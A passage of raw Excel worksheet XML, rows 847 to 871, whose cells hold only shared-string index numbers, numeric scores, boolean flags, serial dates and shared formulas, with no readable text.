        <v>2</v>
      </c>
      <c r="S847" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="1">
        <v>10177.0</v>
      </c>
      <c r="B848" s="2" t="s">
        <v>3704</v>
      </c>
      <c r="C848" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D848" s="2" t="s">
        <v>3705</v>
      </c>
      <c r="E848" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F848" s="1" t="s">
        <v>3551</v>
      </c>
      <c r="G848" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H848" s="1" t="s">
        <v>3706</v>
      </c>
      <c r="I848" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J848" s="1" t="s">
        <v>3707</v>
      </c>
      <c r="K848" s="2" t="s">
        <v>3708</v>
      </c>
      <c r="L848" s="1">
        <v>5.0</v>
      </c>
      <c r="M848" s="1">
        <v>7.0</v>
      </c>
      <c r="N848" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O848" s="1" t="s">
        <v>3709</v>
      </c>
      <c r="P848" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="Q848" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R848" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S848" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="1">
        <v>10178.0</v>
      </c>
      <c r="B849" s="2" t="s">
        <v>3710</v>
      </c>
      <c r="C849" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D849" s="2" t="s">
        <v>3705</v>
      </c>
      <c r="E849" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F849" s="1" t="s">
        <v>3711</v>
      </c>
      <c r="G849" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H849" s="1" t="s">
        <v>3712</v>
      </c>
      <c r="I849" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J849" s="1" t="s">
        <v>3707</v>
      </c>
      <c r="K849" s="2" t="s">
        <v>3708</v>
      </c>
      <c r="L849" s="1">
        <v>5.0</v>
      </c>
      <c r="M849" s="1">
        <v>7.0</v>
      </c>
      <c r="N849" s="1" t="s">
        <v>3713</v>
      </c>
      <c r="O849" s="1" t="s">
        <v>3709</v>
      </c>
      <c r="P849" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q849" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R849" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S849" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="1">
        <v>10181.0</v>
      </c>
      <c r="B850" s="2" t="s">
        <v>3714</v>
      </c>
      <c r="C850" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D850" s="2" t="s">
        <v>3705</v>
      </c>
      <c r="E850" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F850" s="1" t="s">
        <v>3715</v>
      </c>
      <c r="G850" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H850" s="4">
        <v>44506.88958333333</v>
      </c>
      <c r="I850" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J850" s="1" t="s">
        <v>3707</v>
      </c>
      <c r="K850" s="2" t="s">
        <v>3708</v>
      </c>
      <c r="L850" s="1">
        <v>5.0</v>
      </c>
      <c r="M850" s="1">
        <v>7.0</v>
      </c>
      <c r="N850" s="1" t="s">
        <v>3716</v>
      </c>
      <c r="O850" s="1" t="s">
        <v>3709</v>
      </c>
      <c r="P850" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q850" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R850" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S850" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="1">
        <v>10183.0</v>
      </c>
      <c r="B851" s="2" t="s">
        <v>3717</v>
      </c>
      <c r="C851" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D851" s="2" t="s">
        <v>3705</v>
      </c>
      <c r="E851" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F851" s="1" t="s">
        <v>3718</v>
      </c>
      <c r="G851" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H851" s="1" t="s">
        <v>3719</v>
      </c>
      <c r="I851" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J851" s="1" t="s">
        <v>3707</v>
      </c>
      <c r="K851" s="2" t="s">
        <v>3708</v>
      </c>
      <c r="L851" s="1">
        <v>5.0</v>
      </c>
      <c r="M851" s="1">
        <v>7.0</v>
      </c>
      <c r="N851" s="1" t="s">
        <v>3720</v>
      </c>
      <c r="O851" s="1" t="s">
        <v>3709</v>
      </c>
      <c r="P851" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q851" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R851" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S851" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="1">
        <v>10184.0</v>
      </c>
      <c r="B852" s="2" t="s">
        <v>3721</v>
      </c>
      <c r="C852" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D852" s="2" t="s">
        <v>3722</v>
      </c>
      <c r="E852" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F852" s="1" t="s">
        <v>1261</v>
      </c>
      <c r="G852" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H852" s="4">
        <v>43927.7875</v>
      </c>
      <c r="I852" s="1" t="s">
        <v>1263</v>
      </c>
      <c r="J852" s="1" t="s">
        <v>3723</v>
      </c>
      <c r="K852" s="2" t="s">
        <v>3724</v>
      </c>
      <c r="L852" s="1">
        <v>1.0</v>
      </c>
      <c r="M852" s="1">
        <v>1.0</v>
      </c>
      <c r="N852" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O852" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P852" s="1" t="s">
        <v>3725</v>
      </c>
      <c r="Q852" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R852" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S852" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="1">
        <v>10185.0</v>
      </c>
      <c r="B853" s="2" t="s">
        <v>3726</v>
      </c>
      <c r="C853" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D853" s="2" t="s">
        <v>3727</v>
      </c>
      <c r="E853" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F853" s="1" t="s">
        <v>3728</v>
      </c>
      <c r="G853" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H853" s="1" t="s">
        <v>3729</v>
      </c>
      <c r="I853" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J853" s="1" t="s">
        <v>3730</v>
      </c>
      <c r="K853" s="2" t="s">
        <v>3731</v>
      </c>
      <c r="L853" s="1">
        <v>4.0</v>
      </c>
      <c r="M853" s="1">
        <v>8.0</v>
      </c>
      <c r="N853" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O853" s="1" t="s">
        <v>3732</v>
      </c>
      <c r="P853" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q853" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R853" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S853" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="1">
        <v>10186.0</v>
      </c>
      <c r="B854" s="2" t="s">
        <v>3733</v>
      </c>
      <c r="C854" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D854" s="2" t="s">
        <v>3727</v>
      </c>
      <c r="E854" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F854" s="1" t="s">
        <v>43</v>
      </c>
      <c r="G854" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H854" s="1" t="s">
        <v>3734</v>
      </c>
      <c r="I854" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J854" s="1" t="s">
        <v>3730</v>
      </c>
      <c r="K854" s="2" t="s">
        <v>3731</v>
      </c>
      <c r="L854" s="1">
        <v>4.0</v>
      </c>
      <c r="M854" s="1">
        <v>8.0</v>
      </c>
      <c r="N854" s="1" t="s">
        <v>3735</v>
      </c>
      <c r="O854" s="1" t="s">
        <v>3732</v>
      </c>
      <c r="P854" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q854" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R854" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S854" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="1">
        <v>10187.0</v>
      </c>
      <c r="B855" s="2" t="s">
        <v>3736</v>
      </c>
      <c r="C855" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D855" s="2" t="s">
        <v>3727</v>
      </c>
      <c r="E855" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F855" s="1" t="s">
        <v>3728</v>
      </c>
      <c r="G855" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H855" s="1" t="s">
        <v>3737</v>
      </c>
      <c r="I855" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J855" s="1" t="s">
        <v>3730</v>
      </c>
      <c r="K855" s="2" t="s">
        <v>3731</v>
      </c>
      <c r="L855" s="1">
        <v>4.0</v>
      </c>
      <c r="M855" s="1">
        <v>8.0</v>
      </c>
      <c r="N855" s="1" t="s">
        <v>1940</v>
      </c>
      <c r="O855" s="1" t="s">
        <v>3732</v>
      </c>
      <c r="P855" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q855" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R855" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S855" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="1">
        <v>10193.0</v>
      </c>
      <c r="B856" s="2" t="s">
        <v>3738</v>
      </c>
      <c r="C856" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D856" s="2" t="s">
        <v>3739</v>
      </c>
      <c r="E856" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F856" s="1" t="s">
        <v>3740</v>
      </c>
      <c r="G856" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H856" s="1" t="s">
        <v>3741</v>
      </c>
      <c r="I856" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J856" s="1" t="s">
        <v>3742</v>
      </c>
      <c r="K856" s="2" t="s">
        <v>3743</v>
      </c>
      <c r="L856" s="1">
        <v>3.0</v>
      </c>
      <c r="M856" s="1">
        <v>5.0</v>
      </c>
      <c r="N856" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O856" s="1" t="s">
        <v>3744</v>
      </c>
      <c r="P856" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q856" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R856" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S856" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="1">
        <v>10194.0</v>
      </c>
      <c r="B857" s="2" t="s">
        <v>3745</v>
      </c>
      <c r="C857" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D857" s="2" t="s">
        <v>3739</v>
      </c>
      <c r="E857" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F857" s="1" t="s">
        <v>3746</v>
      </c>
      <c r="G857" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H857" s="1" t="s">
        <v>3747</v>
      </c>
      <c r="I857" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J857" s="1" t="s">
        <v>3742</v>
      </c>
      <c r="K857" s="2" t="s">
        <v>3743</v>
      </c>
      <c r="L857" s="1">
        <v>3.0</v>
      </c>
      <c r="M857" s="1">
        <v>5.0</v>
      </c>
      <c r="N857" s="1" t="s">
        <v>1940</v>
      </c>
      <c r="O857" s="1" t="s">
        <v>3744</v>
      </c>
      <c r="P857" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q857" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R857" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S857" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="1">
        <v>10198.0</v>
      </c>
      <c r="B858" s="2" t="s">
        <v>3748</v>
      </c>
      <c r="C858" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D858" s="2" t="s">
        <v>3634</v>
      </c>
      <c r="E858" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F858" s="1" t="s">
        <v>3749</v>
      </c>
      <c r="G858" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H858" s="1" t="s">
        <v>3750</v>
      </c>
      <c r="I858" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J858" s="1" t="s">
        <v>3751</v>
      </c>
      <c r="K858" s="2" t="s">
        <v>3752</v>
      </c>
      <c r="L858" s="1">
        <v>5.0</v>
      </c>
      <c r="M858" s="1">
        <v>5.0</v>
      </c>
      <c r="N858" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O858" s="1" t="s">
        <v>3753</v>
      </c>
      <c r="P858" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q858" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R858" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S858" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="1">
        <v>10202.0</v>
      </c>
      <c r="B859" s="2" t="s">
        <v>3754</v>
      </c>
      <c r="C859" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D859" s="2" t="s">
        <v>3634</v>
      </c>
      <c r="E859" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F859" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G859" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H859" s="1" t="s">
        <v>3755</v>
      </c>
      <c r="I859" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J859" s="1" t="s">
        <v>3751</v>
      </c>
      <c r="K859" s="2" t="s">
        <v>3752</v>
      </c>
      <c r="L859" s="1">
        <v>5.0</v>
      </c>
      <c r="M859" s="1">
        <v>5.0</v>
      </c>
      <c r="N859" s="1" t="s">
        <v>3756</v>
      </c>
      <c r="O859" s="1" t="s">
        <v>3753</v>
      </c>
      <c r="P859" s="1" t="s">
        <v>510</v>
      </c>
      <c r="Q859" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R859" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S859" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="1">
        <v>10203.0</v>
      </c>
      <c r="B860" s="2" t="s">
        <v>3757</v>
      </c>
      <c r="C860" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D860" s="2" t="s">
        <v>3758</v>
      </c>
      <c r="E860" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F860" s="1" t="s">
        <v>3759</v>
      </c>
      <c r="G860" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H860" s="1" t="s">
        <v>3760</v>
      </c>
      <c r="I860" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J860" s="1" t="s">
        <v>3761</v>
      </c>
      <c r="K860" s="2" t="s">
        <v>3762</v>
      </c>
      <c r="L860" s="1">
        <v>6.0</v>
      </c>
      <c r="M860" s="1">
        <v>9.0</v>
      </c>
      <c r="N860" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O860" s="1" t="s">
        <v>3763</v>
      </c>
      <c r="P860" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q860" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R860" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S860" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="1">
        <v>10204.0</v>
      </c>
      <c r="B861" s="2" t="s">
        <v>3764</v>
      </c>
      <c r="C861" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D861" s="2" t="s">
        <v>3758</v>
      </c>
      <c r="E861" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F861" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G861" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H861" s="1" t="s">
        <v>3765</v>
      </c>
      <c r="I861" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J861" s="1" t="s">
        <v>3761</v>
      </c>
      <c r="K861" s="2" t="s">
        <v>3762</v>
      </c>
      <c r="L861" s="1">
        <v>6.0</v>
      </c>
      <c r="M861" s="1">
        <v>9.0</v>
      </c>
      <c r="N861" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="O861" s="1" t="s">
        <v>3763</v>
      </c>
      <c r="P861" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q861" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R861" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S861" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="1">
        <v>10209.0</v>
      </c>
      <c r="B862" s="2" t="s">
        <v>3766</v>
      </c>
      <c r="C862" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D862" s="2" t="s">
        <v>3758</v>
      </c>
      <c r="E862" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F862" s="1" t="s">
        <v>1919</v>
      </c>
      <c r="G862" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H862" s="1" t="s">
        <v>3767</v>
      </c>
      <c r="I862" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J862" s="1" t="s">
        <v>3761</v>
      </c>
      <c r="K862" s="2" t="s">
        <v>3762</v>
      </c>
      <c r="L862" s="1">
        <v>6.0</v>
      </c>
      <c r="M862" s="1">
        <v>9.0</v>
      </c>
      <c r="N862" s="1" t="s">
        <v>1108</v>
      </c>
      <c r="O862" s="1" t="s">
        <v>3763</v>
      </c>
      <c r="P862" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q862" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R862" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S862" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="1">
        <v>10212.0</v>
      </c>
      <c r="B863" s="2" t="s">
        <v>3768</v>
      </c>
      <c r="C863" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D863" s="2" t="s">
        <v>3769</v>
      </c>
      <c r="E863" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F863" s="1" t="s">
        <v>3770</v>
      </c>
      <c r="G863" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H863" s="1" t="s">
        <v>3771</v>
      </c>
      <c r="I863" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J863" s="1" t="s">
        <v>3772</v>
      </c>
      <c r="K863" s="2" t="s">
        <v>3773</v>
      </c>
      <c r="L863" s="1">
        <v>5.0</v>
      </c>
      <c r="M863" s="1">
        <v>5.0</v>
      </c>
      <c r="N863" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O863" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="P863" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q863" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R863" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S863" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="1">
        <v>10213.0</v>
      </c>
      <c r="B864" s="2" t="s">
        <v>3775</v>
      </c>
      <c r="C864" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D864" s="2" t="s">
        <v>3769</v>
      </c>
      <c r="E864" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F864" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G864" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H864" s="1" t="s">
        <v>3776</v>
      </c>
      <c r="I864" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J864" s="1" t="s">
        <v>3772</v>
      </c>
      <c r="K864" s="2" t="s">
        <v>3773</v>
      </c>
      <c r="L864" s="1">
        <v>5.0</v>
      </c>
      <c r="M864" s="1">
        <v>5.0</v>
      </c>
      <c r="N864" s="1" t="s">
        <v>3777</v>
      </c>
      <c r="O864" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="P864" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q864" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R864" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S864" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="1">
        <v>10214.0</v>
      </c>
      <c r="B865" s="2" t="s">
        <v>3778</v>
      </c>
      <c r="C865" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D865" s="2" t="s">
        <v>3769</v>
      </c>
      <c r="E865" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F865" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="G865" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H865" s="1" t="s">
        <v>3779</v>
      </c>
      <c r="I865" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J865" s="1" t="s">
        <v>3772</v>
      </c>
      <c r="K865" s="2" t="s">
        <v>3773</v>
      </c>
      <c r="L865" s="1">
        <v>5.0</v>
      </c>
      <c r="M865" s="1">
        <v>5.0</v>
      </c>
      <c r="N865" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="O865" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="P865" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q865" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R865" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S865" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="1">
        <v>10215.0</v>
      </c>
      <c r="B866" s="2" t="s">
        <v>3780</v>
      </c>
      <c r="C866" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D866" s="2" t="s">
        <v>3769</v>
      </c>
      <c r="E866" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F866" s="1" t="s">
        <v>3781</v>
      </c>
      <c r="G866" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H866" s="1" t="s">
        <v>3782</v>
      </c>
      <c r="I866" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J866" s="1" t="s">
        <v>3772</v>
      </c>
      <c r="K866" s="2" t="s">
        <v>3773</v>
      </c>
      <c r="L866" s="1">
        <v>5.0</v>
      </c>
      <c r="M866" s="1">
        <v>5.0</v>
      </c>
      <c r="N866" s="1" t="s">
        <v>1637</v>
      </c>
      <c r="O866" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="P866" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q866" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R866" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S866" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="1">
        <v>10216.0</v>
      </c>
      <c r="B867" s="2" t="s">
        <v>3783</v>
      </c>
      <c r="C867" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D867" s="2" t="s">
        <v>3769</v>
      </c>
      <c r="E867" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F867" s="1" t="s">
        <v>3539</v>
      </c>
      <c r="G867" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H867" s="1" t="s">
        <v>3784</v>
      </c>
      <c r="I867" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J867" s="1" t="s">
        <v>3772</v>
      </c>
      <c r="K867" s="2" t="s">
        <v>3773</v>
      </c>
      <c r="L867" s="1">
        <v>5.0</v>
      </c>
      <c r="M867" s="1">
        <v>5.0</v>
      </c>
      <c r="N867" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="O867" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="P867" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q867" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R867" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S867" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="1">
        <v>10219.0</v>
      </c>
      <c r="B868" s="2" t="s">
        <v>3785</v>
      </c>
      <c r="C868" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D868" s="2" t="s">
        <v>3786</v>
      </c>
      <c r="E868" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F868" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G868" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H868" s="4">
        <v>44809.79027777778</v>
      </c>
      <c r="I868" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J868" s="1" t="s">
        <v>3787</v>
      </c>
      <c r="K868" s="2" t="s">
        <v>3788</v>
      </c>
      <c r="L868" s="1">
        <v>6.0</v>
      </c>
      <c r="M868" s="1">
        <v>9.0</v>
      </c>
      <c r="N868" s="1" t="s">
        <v>3789</v>
      </c>
      <c r="O868" s="1" t="s">
        <v>3790</v>
      </c>
      <c r="P868" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q868" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R868" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S868" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="1">
        <v>10220.0</v>
      </c>
      <c r="B869" s="2" t="s">
        <v>3791</v>
      </c>
      <c r="C869" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D869" s="2" t="s">
        <v>3792</v>
      </c>
      <c r="E869" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F869" s="1" t="s">
        <v>3793</v>
      </c>
      <c r="G869" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H869" s="4">
        <v>44809.91736111111</v>
      </c>
      <c r="I869" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J869" s="1" t="s">
        <v>3787</v>
      </c>
      <c r="K869" s="2" t="s">
        <v>3788</v>
      </c>
      <c r="L869" s="1">
        <v>6.0</v>
      </c>
      <c r="M869" s="1">
        <v>9.0</v>
      </c>
      <c r="N869" s="1" t="s">
        <v>3794</v>
      </c>
      <c r="O869" s="1" t="s">
        <v>3790</v>
      </c>
      <c r="P869" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q869" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R869" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S869" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="1">
        <v>10221.0</v>
      </c>
      <c r="B870" s="2" t="s">
        <v>3795</v>
      </c>
      <c r="C870" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D870" s="2" t="s">
        <v>3796</v>
      </c>
      <c r="E870" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F870" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G870" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H870" s="4">
        <v>44839.24236111111</v>
      </c>
      <c r="I870" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J870" s="1" t="s">
        <v>3787</v>
      </c>
      <c r="K870" s="2" t="s">
        <v>3788</v>
      </c>
      <c r="L870" s="1">
        <v>6.0</v>
      </c>
      <c r="M870" s="1">
        <v>9.0</v>
      </c>
      <c r="N870" s="1" t="s">
        <v>2230</v>
      </c>
      <c r="O870" s="1" t="s">
        <v>3790</v>
      </c>
      <c r="P870" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q870" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R870" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S870" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="1">
        <v>10225.0</v>
      </c>
      <c r="B871" s="2" t="s">
        <v>3797</v>
      </c>
      <c r="C871" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D871" s="2" t="s">
        <v>3796</v>
      </c>
      <c r="E871" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F871" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G871" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H871" s="4">
